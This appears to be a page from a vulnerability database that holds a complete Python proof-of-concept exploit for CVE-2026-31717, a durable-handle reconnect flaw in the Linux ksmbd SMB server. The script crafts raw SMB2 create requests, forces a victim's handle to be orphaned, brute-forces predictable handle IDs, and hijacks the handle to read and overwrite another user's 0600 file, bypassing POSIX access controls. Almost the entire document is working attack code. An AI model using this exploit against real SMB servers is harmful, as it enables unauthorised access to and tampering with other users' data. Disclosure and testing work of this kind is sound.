5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-31717 — ksmbd DHnC durable-handle reconnect access-control bypass
==========================================================================

smb2_check_durable_oplock() in fs/smb/server/oplock.c falls through the
non-lease branch (oplock.c:1852-1864 `goto out`) without verifying the
reconnecting user. parse_durable_handle_context() (smb2pdu.c:2796) only
looks up by attacker-supplied persistent_id; idr_alloc_cyclic() makes
those IDs trivially predictable.

Impact: any authenticated SMB user can hijack an orphaned v1 durable
handle belonging to another user. Subsequent read/write goes through
the original opener's struct file (fp->filp), so kernel_read/write use
the victim's f_cred — bypassing POSIX ACLs.

Affected dialects: SMB 2.1 (0x0210) and above. v1 (DHnQ/DHnC) is the
bruteforceable path; v2 (DH2C) gates by 128-bit CreateGuid.

Public reference:
  https://lore.kernel.org/linux-cve-announce/2026050124-CVE-2026-31717-f68b@gregkh/

Modes:
  acl-bypass   POSIX-0600 ACL-bypass demonstration (headline)
  victim       Phase 1 only — open + orphan (cross-host setup)
  attack       Phase 2 only — bruteforce a PID range (cross-host setup)
"""

import argparse
import socket
import struct
import sys
import time

from impacket.smbconnection import SMBConnection
from impacket import smb3, smb3structs as s
from impacket.nt_errors import STATUS_SUCCESS

STATUS_ACCESS_DENIED = 0xC0000022

DIALECT_MAP = {
    "2.1":   s.SMB2_DIALECT_21,
    "3.0":   s.SMB2_DIALECT_30,
    "3.1.1": s.SMB2_DIALECT_311,
}


# ── Helpers to build raw create contexts ────────────────────────────

def build_create_context(name, data, is_last=True):
    """Build a single SMB2_CREATE_CONTEXT blob.
    name: 4-byte context name (e.g. b"DHnQ")
    data: context data bytes
    is_last: if False, sets Next pointer for chaining"""

    name_offset = 16  # fixed header size = where Name starts
    name_length = len(name)
    # Data must be 8-byte aligned after name
    name_padded_len = (name_length + 7) & ~7
    data_offset = name_offset + name_padded_len
    data_length = len(data)

    total_size = data_offset + data_length
    # Next must be 8-byte aligned
    next_offset = 0 if is_last else ((total_size + 7) & ~7)

    hdr = struct.pack("<I HH HH I",
                      next_offset,
                      name_offset,
                      name_length,
                      0,              # Reserved
                      data_offset,
                      data_length)
    buf = hdr + name + b"\x00" * (name_padded_len - name_length) + data

    if not is_last:
        # Pad to 8-byte alignment for next context
        pad = next_offset - len(buf)
        if pad > 0:
            buf += b"\x00" * pad
    return buf


def build_dhnq_context():
    """DHnQ - Durable Handle Request v1.
    Data is 16 bytes of zeros."""
    return build_create_context(b"DHnQ", b"\x00" * 16)


def build_dhnc_context(persistent_id):
    """DHnC - Durable Handle Reconnect v1.
    Data is SMB2_FILEID: PersistentFileId(8) + VolatileFileId(8)."""
    data = struct.pack("<QQ", persistent_id, 0)
    return build_create_context(b"DHnC", data)


# ── SMB2 client wrapper using impacket ──────────────────────────────

class KsmbdClient:
    """Thin wrapper around impacket's SMBConnection for the exploit."""

    def __init__(self, target, port=445):
        self.target = target
        self.port = port
        self.conn = None
        self.tree_id = None

    def connect_and_auth(self, username, password, domain="", dialect="3.0"):
        """Connect, negotiate the requested dialect, authenticate."""
        self.conn = SMBConnection(self.target, self.target, sess_port=self.port,
                                  preferredDialect=DIALECT_MAP[dialect],
                                  timeout=30)
        self.conn.login(username, password, domain)
        print(f"  [+] Authenticated as '{username}' over SMB {dialect}, "
              f"session=0x{self.conn.getSMBServer()._Session['SessionID']:X}")

    def tree_connect(self, share):
        """Connect to a share."""
        self.tree_id = self.conn.connectTree(share)
        print(f"  [+] Connected to {share}, tree=0x{self.tree_id:X}")

    def create_durable(self, filename):
        """Open/create file with batch oplock + DHnQ (v1 durable handle request).
        Returns (persistent_id, volatile_id, file_id_tuple)."""
        smb = self.conn.getSMBServer()

        # Build CREATE request manually for full control over oplock + contexts
        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_CREATE
        pkt['TreeID'] = self.tree_id

        create_req = s.SMB2Create()
        create_req['SecurityFlags'] = 0
        create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
        create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
        create_req['DesiredAccess'] = (s.FILE_READ_DATA | s.FILE_WRITE_DATA |
                                       s.FILE_READ_ATTRIBUTES | s.DELETE |
                                       s.SYNCHRONIZE)
        create_req['FileAttributes'] = s.FILE_ATTRIBUTE_NORMAL
        create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
        # FILE_OVERWRITE_IF truncates if existing — keeps the demo's read
        # output clean (no leftover placeholder bytes after the secret).
        create_req['CreateDisposition'] = s.FILE_OVERWRITE_IF
        create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE

        # Filename
        name_bytes = filename.encode("utf-16-le")
        create_req['NameLength'] = len(name_bytes)

        # Create context: DHnQ (durable handle request)
        dhnq = build_dhnq_context()
        create_req['CreateContextsLength'] = len(dhnq)

        # Assemble buffer: name + padding + contexts
        name_padded = name_bytes + b"\x00" * ((8 - len(name_bytes) % 8) % 8)
        create_req['Buffer'] = name_padded + dhnq

        # Fix offsets (relative to start of SMB2 header)
        # SMB2 header = 64 bytes, CREATE fixed body = 56 bytes (StructureSize=57, odd)
        name_offset = 64 + 56  # 120
        ctx_offset = name_offset + len(name_padded)
        create_req['NameOffset'] = name_offset
        create_req['CreateContextsOffset'] = ctx_offset

        pkt['Data'] = create_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"CREATE failed: 0x{status:08X}")

        create_resp = s.SMB2Create_Response(resp['Data'])
        oplock = create_resp['OplockLevel']
        pid = create_resp['FileID'].fields['Persistent']
        vid = create_resp['FileID'].fields['Volatile']

        print(f"  [+] Opened '{filename}' - oplock=0x{oplock:02X}, "
              f"persistent_id={pid}, volatile_id={vid}")

        if oplock != s.SMB2_OPLOCK_LEVEL_BATCH:
            print(f"  [!] WARNING: Got oplock 0x{oplock:02X}, not BATCH (0x09)")

        file_id = s.SMB2_FILEID()
        file_id['Persistent'] = pid
        file_id['Volatile'] = vid
        return pid, vid, file_id

    def create_reconnect_dhnc(self, persistent_id):
        """Attempt DHnC reconnect to an orphaned durable handle.
        Returns (persistent_id, volatile_id, file_id) on success, None on failure."""
        smb = self.conn.getSMBServer()

        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_CREATE
        pkt['TreeID'] = self.tree_id

        create_req = s.SMB2Create()
        create_req['SecurityFlags'] = 0
        create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
        create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
        # DesiredAccess MUST be non-zero - ksmbd rejects 0 at smb2pdu.c:3090
        # before reaching the durable context handler. Use minimal read access.
        create_req['DesiredAccess'] = s.FILE_READ_DATA | s.FILE_WRITE_DATA
        create_req['FileAttributes'] = 0
        create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
        create_req['CreateDisposition'] = s.FILE_OPEN
        create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE

        # Empty filename
        create_req['NameLength'] = 0

        # DHnC context with target persistent_id
        dhnc = build_dhnc_context(persistent_id)
        create_req['CreateContextsLength'] = len(dhnc)

        # Buffer: pad for name area + contexts
        name_pad = b"\x00" * 8
        create_req['Buffer'] = name_pad + dhnc

        name_offset = 64 + 56
        ctx_offset = name_offset + len(name_pad)
        create_req['NameOffset'] = name_offset
        create_req['CreateContextsOffset'] = ctx_offset

        pkt['Data'] = create_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            if status != 0xC0000034:  # STATUS_OBJECT_NAME_NOT_FOUND (expected for non-existent IDs)
                print(f"  [*] pid={persistent_id}: status=0x{status:08X}")
            return None

        create_resp = s.SMB2Create_Response(resp['Data'])
        pid = create_resp['FileID'].fields['Persistent']
        vid = create_resp['FileID'].fields['Volatile']

        file_id = s.SMB2_FILEID()
        file_id['Persistent'] = pid
        file_id['Volatile'] = vid
        return pid, vid, file_id

    def normal_create_status(self, filename, access=s.FILE_READ_DATA):
        """Plain CREATE with no DH context. Used as the ACL control test:
        on a 0600 file owned by another user, ksmbd must return
        STATUS_ACCESS_DENIED. Returns the NT status code (success or error)."""
        try:
            file_id = self.conn.openFile(self.tree_id, filename,
                                         desiredAccess=access,
                                         shareMode=s.FILE_SHARE_READ,
                                         creationDisposition=s.FILE_OPEN)
            try:
                self.conn.closeFile(self.tree_id, file_id)
            except Exception:
                pass
            return STATUS_SUCCESS
        except Exception as e:
            msg = str(e).upper()
            # impacket raises with status hex/name in the string
            if "ACCESS_DENIED" in msg or "C0000022" in msg:
                return STATUS_ACCESS_DENIED
            for tok in msg.replace(",", " ").split():
                if tok.startswith("0X"):
                    try:
                        return int(tok, 16)
                    except ValueError:
                        pass
            raise

    def read_file(self, file_id, offset=0, length=4096):
        """Read from an open file handle."""
        smb = self.conn.getSMBServer()

        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_READ
        pkt['TreeID'] = self.tree_id

        read_req = s.SMB2Read()
        read_req['Padding'] = 0x50
        read_req['Length'] = length
        read_req['Offset'] = offset
        read_req['FileID'] = file_id
        read_req['MinimumCount'] = 0
        read_req['RemainingBytes'] = 0

        pkt['Data'] = read_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"READ failed: 0x{status:08X}")

        read_resp = s.SMB2Read_Response(resp['Data'])
        return read_resp['Buffer']

    def write_file(self, file_id, data, offset=0):
        """Write to an open file handle."""
        smb = self.conn.getSMBServer()

        pkt = smb3.SMB2Packet()
        pkt['Command'] = s.SMB2_WRITE
        pkt['TreeID'] = self.tree_id

        write_req = s.SMB2Write()
        write_req['FileID'] = file_id
        write_req['Length'] = len(data)
        write_req['Offset'] = offset
        write_req['WriteChannelInfoOffset'] = 0
        write_req['WriteChannelInfoLength'] = 0
        write_req['Channel'] = 0
        write_req['RemainingBytes'] = 0
        write_req['Flags'] = 0
        write_req['Buffer'] = data

        pkt['Data'] = write_req

        smb.sendSMB(pkt)
        resp = smb.recvSMB()

        status = resp['Status']
        if status != STATUS_SUCCESS:
            raise RuntimeError(f"WRITE failed: 0x{status:08X}")

        write_resp = s.SMB2Write_Response(resp['Data'])
        return write_resp['Count']

    def disconnect_orphan(self, graceful=False):
        """Drop the session WITHOUT closing the durable handle.

        Default: TCP RST via SO_LINGER {1, 0} — models a real orphan event
        (laptop sleep, WiFi roam, VPN flap, NIC down). graceful=True sends
        SMB2 LOGOFF + FIN instead. Either way, fp->conn becomes NULL and the
        handle persists in global_ft until the durable scavenger reaps it.
        """
        try:
            sock = self.conn.getSMBServer().get_socket()
        except Exception:
            sock = None

        if not graceful and sock is not None:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                                struct.pack("ii", 1, 0))
                sock.close()
                print("  [+] TCP RST sent — handle orphaned in ksmbd")
                self.conn = None
                return
            except Exception as e:
                print(f"  [!] RST failed ({e}); falling back to graceful close")

        try: self.conn.logoff()
        except Exception: pass
        try: self.conn.getSMBServer().close_session()
        except Exception: pass
        print("  [+] Session graceful logoff (LOGOFF + FIN) — handle orphaned")
        self.conn = None


# ── Exploit phases ──────────────────────────────────────────────────

def phase_victim(args, secret=b"1337 stuff\n"):
    """Phase 1: Victim opens a file with batch oplock + durable handle,
    writes sensitive data, then disconnects (TCP RST by default)."""

    print("[*] Phase 1: Victim creates durable handle")
    print(f"    Target: {args.target}:{args.port}")
    print(f"    Share:  {args.share}")
    print(f"    User:   {args.user}")
    print(f"    File:   {args.file}")

    c = KsmbdClient(args.target, args.port)
    c.connect_and_auth(args.user, args.password, args.domain, dialect=args.dialect)
    c.tree_connect(args.share)

    pid, _, fid = c.create_durable(args.file)

    written = c.write_file(fid, secret)
    print(f"  [+] Wrote {written} bytes of sensitive data")

    data = c.read_file(fid, length=len(secret))
    print(f"  [+] Verified read: {data[:50]}...")

    print(f"\n  [*] Persistent ID to target: {pid}")
    c.disconnect_orphan(graceful=args.graceful)
    print(f"  [+] Handle {pid} orphaned (persists until durable scavenger timeout).\n")
    return pid


def phase_attack(args, known_pid=None):
    """Phase 2: Attacker brute-forces persistent IDs to hijack
    an orphaned v1 durable handle via DHnC."""

    print("[*] Phase 2: Attacker hijacks orphaned durable handle")
    atk_user = getattr(args, "user2", None) or args.user
    atk_pass = getattr(args, "password2", None) or args.password
    print(f"    Target: {args.target}:{args.port}")
    print(f"    User:   {atk_user}")

    pid_start = getattr(args, "pid_start", 0)
    pid_end = getattr(args, "pid_end", 64)
    print(f"    Brute-force range: {pid_start}-{pid_end}")

    c = KsmbdClient(args.target, args.port)
    c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
    c.tree_connect(args.share)

    print(f"  [*] Scanning persistent IDs for orphaned durable handles...")

    scan_range = list(range(pid_start, pid_end + 1))
    if known_pid is not None:
        # Try known PID first
        if known_pid in scan_range:
            scan_range.remove(known_pid)
        scan_range.insert(0, known_pid)

    hijacked = []

    for pid in scan_range:
        try:
            result = c.create_reconnect_dhnc(pid)
        except Exception as e:
            # Connection may reset - reconnect
            print(f"  [*] Error at pid={pid}: {e}, reconnecting...")
            try:
                c = KsmbdClient(args.target, args.port)
                c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
                c.tree_connect(args.share)
            except Exception:
                print(f"  [!] Reconnect failed, aborting scan")
                break
            continue

        if result is None:
            if pid % 10 == 0 and pid != known_pid:
                sys.stdout.write(f"\r  [*] Scanned pid={pid}...")
                sys.stdout.flush()
            continue

        _, _, new_fid = result
        print(f"\n  [!!] HIJACKED persistent_id={pid} as '{atk_user}'")

        try:
            data = c.read_file(new_fid, length=4096).rstrip(b"\x00").rstrip()
            print(f"  [!!] READ {len(data)} bytes: {data!r}")
        except Exception as e:
            print(f"  [*] Read attempt: {e}")

        try:
            written = c.write_file(new_fid, b"It's my session now :)\n", offset=0)
            print(f"  [!!] WROTE {written} bytes (overwrote victim's content)")
        except Exception as e:
            print(f"  [*] Write attempt: {e}")

        hijacked.append(pid)
        break  # Got one

    if not hijacked:
        print(f"\n  [-] No orphaned durable handles found in range {pid_start}-{pid_end}")
    else:
        print(f"\n  [+] Successfully hijacked {len(hijacked)} handle(s): {hijacked}")

    return hijacked


def phase_acl_bypass(args):
    """Headline scenario: prove POSIX 0600 ACL bypass.

    Step c (control before) and step e (control after) bracket the exploit:
    if normal CREATE is denied to the attacker both before AND after the
    hijack, but the attacker can read+write via DHnC reconnect, then
    f_cred-bypass is the only explanation."""

    print("=" * 70)
    print("CVE-2026-31717 PoC — POSIX ACL bypass via DHnC durable-handle hijack")
    print("=" * 70)
    print()

    atk_user, atk_pass = args.user2, args.password2
    rw = s.FILE_READ_DATA | s.FILE_WRITE_DATA

    def attacker_session():
        c = KsmbdClient(args.target, args.port)
        c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
        c.tree_connect(args.share)
        return c

    def control_check(c, label):
        st = c.normal_create_status(args.file, access=rw)
        if st == STATUS_ACCESS_DENIED:
            print(f"  [+] CONTROL {label}: normal CREATE → STATUS_ACCESS_DENIED ✓")
            return True
        print(f"  [!] CONTROL {label}: status=0x{st:08X} (expected 0xC0000022)")
        return False

    # (a) Victim opens, writes, abrupt-disconnects.
    pid = phase_victim(args, secret=b"TOP SECRET\n")
    print("[*] Waiting 3 seconds for ksmbd to mark the handle orphaned...")
    time.sleep(3)

    # (b)+(c) Attacker authenticates and proves it can't reach the file normally.
    print(f"\n[*] Phase 2: Attacker '{atk_user}' attempts ACL bypass")
    c = attacker_session()
    if not control_check(c, "pre-exploit"):
        print(f"      Server-side ACL setup is wrong ({atk_user} can already "
              f"access {args.file}). Aborting demo.")
        return

    # (d) Exploit: DHnC reconnect, read+write through victim's f_cred.
    print(f"\n  [*] DHnC reconnect to known pid={pid}")
    result = c.create_reconnect_dhnc(pid)
    if result is None:
        print(f"  [-] direct reconnect failed; brute-forcing pid±2")
        try: c.disconnect_orphan(graceful=True)
        except Exception: pass
        args.pid_start, args.pid_end = max(0, pid - 2), pid + 2
        if not phase_attack(args, known_pid=pid):
            print("  [-] No handle hijacked. Was the victim's pid reaped already?")
        return

    _, _, new_fid = result
    print(f"  [!!] HIJACKED persistent_id={pid}")

    data = c.read_file(new_fid, length=4096).rstrip(b"\x00")
    print(f"  [!!] READ as {atk_user}: {data!r}  (POSIX 0600 bypassed)")

    written = c.write_file(new_fid, f"PWNED by {atk_user}\n".encode())
    print(f"  [!!] WROTE {written} bytes as {atk_user}  (POSIX 0600 bypassed)")

    # (e) Reconnect cleanly and prove the file mode is unchanged.
    try: c.disconnect_orphan(graceful=True)
    except Exception: pass
    print()
    if control_check(attacker_session(), "post-exploit"):
        print(f"      File POSIX mode unchanged; writes only succeeded because "
              f"the hijacked fp->filp carried the victim's f_cred.")

    print(f"\n  [+] Server-side verification (run on the ksmbd host):")
    print(f"      stat {args.file}  &&  cat {args.file}")
    print(f"      Expect: 0600 victim:victim, contents = 'PWNED by {atk_user}\\n'")


# ── Main ────────────────────────────────────────────────────────────

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-31717: ksmbd DHnC durable-handle hijack PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=__doc__
    )
    sub = parser.add_subparsers(dest="mode", required=True)

    for name, help_text in [("victim",     "Create durable handle as victim"),
                            ("attack",     "Hijack orphaned handle as attacker"),
                            ("acl-bypass", "Headline: POSIX 0600 ACL bypass")]:
        p = sub.add_parser(name, help=help_text)
        p.add_argument("--target", required=True, help="ksmbd server IP")
        p.add_argument("--port", type=int, default=445)
        p.add_argument("--share", required=True, help="Share name")
        p.add_argument("--user", required=True, help="Username")
        p.add_argument("--password", required=True, help="Password")
        p.add_argument("--domain", default="")
        p.add_argument("--dialect", choices=list(DIALECT_MAP.keys()), default="3.0",
                       help="SMB dialect to negotiate (default: 3.0; 2.1 also works)")
        p.add_argument("--graceful", action="store_true",
                       help="Use SMB2 LOGOFF + FIN instead of TCP RST when orphaning")

        if name in ("victim", "acl-bypass"):
            p.add_argument("--file", default="secret.txt")
        if name == "attack":
            p.add_argument("--pid-start", type=int, default=0)
            p.add_argument("--pid-end", type=int, default=64)
        if name == "acl-bypass":
            p.add_argument("--user2", required=True, help="Attacker username")
            p.add_argument("--password2", required=True, help="Attacker password")

    args = parser.parse_args()

    if args.mode == "victim":
        phase_victim(args)
    elif args.mode == "attack":
        phase_attack(args)
    elif args.mode == "acl-bypass":
        phase_acl_bypass(args)


if __name__ == "__main__":
    main()